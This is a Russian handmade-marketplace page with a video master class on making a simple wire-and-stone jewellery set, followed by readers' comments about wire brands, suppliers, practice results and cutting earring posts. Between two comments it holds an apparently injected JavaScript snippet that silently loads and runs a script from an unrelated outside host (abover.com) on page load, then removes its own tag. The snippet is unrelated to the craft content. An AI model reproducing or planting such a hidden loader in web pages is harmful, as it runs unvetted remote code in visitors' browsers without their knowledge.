> Журнал > Мастер-Классы > Простой комплект из проволоки и камней

Простой комплект из проволоки и камней

01.02.2014 1:43     Просмотров: 9321     Комментариев: 27     
Виды творчества:   Бижутерия своими руками > Wire Work / Wire Wrap
Сложность:   средняя
Время работы:   1 час
Простой комплект из проволоки и камней | Ярмарка Мастеров - ручная работа, handmade

Здравствуйте! В видео делаю достаточно простой, но эффектный комплект. Скоро весна, а потом и лето! такие украшения можно легко и быстро сделать во всех цветах радуги. С каждым новым комплектом работа будет даваться все легче и легче ;0)

Творите на радость себе и окружающим!)

Ключевые слова:  
Материалы:  
Ярмарка Мастеров - ручная работа, handmade

Аня, спасибо!

Очень захотелось попробовать.

АННА ВЕКУА авторские украшения

Наталья, рада, что МК побуждает к действию{#}

Анна, отличный МК! Спасибо! А какой марки проволоку вы используете?

Светлана, рада, что МК понравился!) Использую сейчас в основном Efco(т.к.больше всего ее продают). Но в целом вся проволока для бижутерии, которая есть на рынке мне нравилась.

Какой замечательный мастер-класс! Спасибо, Анна, за вашу работу.

У вас очень красивые украшения!!!

Светлана, спасибо за приятные слова!)

очень элегантный комплект! нежный и деликатный!

Маргарита, рада, что комплект понравился!!!{#}

Прелесть невероятная! Спасибо за МК, очень полезный!

Марина, как раз к лету можно сделать комплекты под все костюмы {#}

елена-germik
Очень люблю проволоку.Смотрела с удовольствием,все очень доступно и понятно.

УРА! УРА! Я обладатель ТРЕХ таких комплектов!!! Себе купила, друзьям и маме подарила! Анечка, спасибо вам за чудо труд! Вы безмерно радуете меня и всех остальных каждой своей работой! Я далека от этого вида творчества, но уловила тепло и добро, с которыми вы делаете свои работы! Спасибо за творчество! И - успехов вам!

Альбина, какприятно{#} спасибо вам за все положительные эмоции, которые дарите!!!!{#}

Здорово!А не подскажите где можно приобрести проволку?Она серебряная?

Арина, рада, что МК понравился!) К сожалению, с проволокой в стране напряженка) Там, где я ее покупаю постоянно перебои с поставками(( не могу дать ссылку на конкретный магазин. Проволока постоянно исчезает, а когда появляется я просто сразу много закупаю. Сейчас кину в личку вам один магазинчик, но сразу говорю, что там проволоку подороже продают. Зато ассортимент в магазине отличный

Очень интересно!!!

Проволоки нет,но попробовать захотелось...

Выход есть всегда...Взяла бусины и.... проволоку у мужа ,строительную...носить их нельзя ,но попробовать сам процесс{#}{#}

вот ,что получилось

Светлана, как же приятно видеть результат!!!{#} Сама не ожидала,что так обрадуюсь) У вас отлично получилось! И завиток верхний прямо классно удался) А нижний на носибельном комплекте потом поаккуратней загнете(верхний такой ровный, что и нижний точно получится). Обмотка камушка идеальная! Спасибо за фото!

Светлана Студинская

Спасибо!

Я проволоки не расчитала,на нижний совсем мало оталось.

Сам процесс очень захватил...думаю попорчу мужу еще немного проволоки,потренируюсь пока своей нет,у меня только тонкая совсем{#}

Спасибо вам{#}{#}

Светлана,я так и поняла(про завиток). Для тренировки хорошо, что есть проволока под рукой) будьте готовы к тому, что скорее всего проволока для украшений окажется жестче, чем та, на которой вы сейчас тренируетесь. Но к этому быстро привыкнете)

Юлия

Здравствуйте, очень интересно получается у вас. Вопрос созрел: когда проволоку образаете ( чем?) под гвоздики, то ведь срез получается продавленный в середине и с острыми ушками ( как у подушки) Разве нет? Как сделать ровный и не травмоопасный срез?

// <![CDATA[ (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })(); // ]]>

Юля, рада, что МК понравился) обратите внимание, как я в видео при обрезании гвоздика у серьги разворачиваю бокорезы. При таком развороте инструмента срез получается ровный. Далее гвоздик обтачиваю напильником. В итоге получается просто сглаженый кончик

JoyJevis! - украшения ручной работы

Спасибо большое за МК. С его помощью я не только попробовала смастерить сережки {из проволоки, которая уже очень долго лежала без дела}

но и вдохновилась на новое украшение на шею! Безмерно благодарю!

Настя, спасибо, что поделились результатом работы! Серьги очень аккуратные получились! И колье такое оригинальное! Класс!{#}

Елена-TSK

Очень полезный и оригинальный МК, просто и со вкусом! Как раз то, что мне так нравится, проволока и все что с ней связано image

Если можно, Анна, Вы не могли бы мне тоже скинуть в личку ссылку на магазинчик с проволокой? Я бы хотела серебрянную и для посеребренную на всякий случай. А пока тренируюсь с алюминиевой.

Спасибо за МК!

спасибо за МК {#} попробуемс))

Спасибо за мк! Очень доступное и наглядное объяснение {#}

Оксана

Благодарю!

Жми «Нравится»
и подписывайся на нас в Facebook!

Шаг 1 из 3: Создание магазина

Откройте собственный онлайн-магазин в несколько простых шагов и зарабатывайте любимым творчеством
Как будет называться магазин?
Какой у него будет web-адрес?

Шаг 2 из 3: Регистрация

Укажите контактные данные для своего магазина. Уже есть аккаунт?
Введите email
Придумайте пароль
Укажите свой город
< Назад

Шаг 3 из 3: Проверка email

• Магазин
Остался завершающий шаг! Мы отправили Вам письмо, перейдите по ссылке в нем, чтобы подтвердить свою почту и начать работу с магазином.
Если письмо не пришло — можем отправить еще раз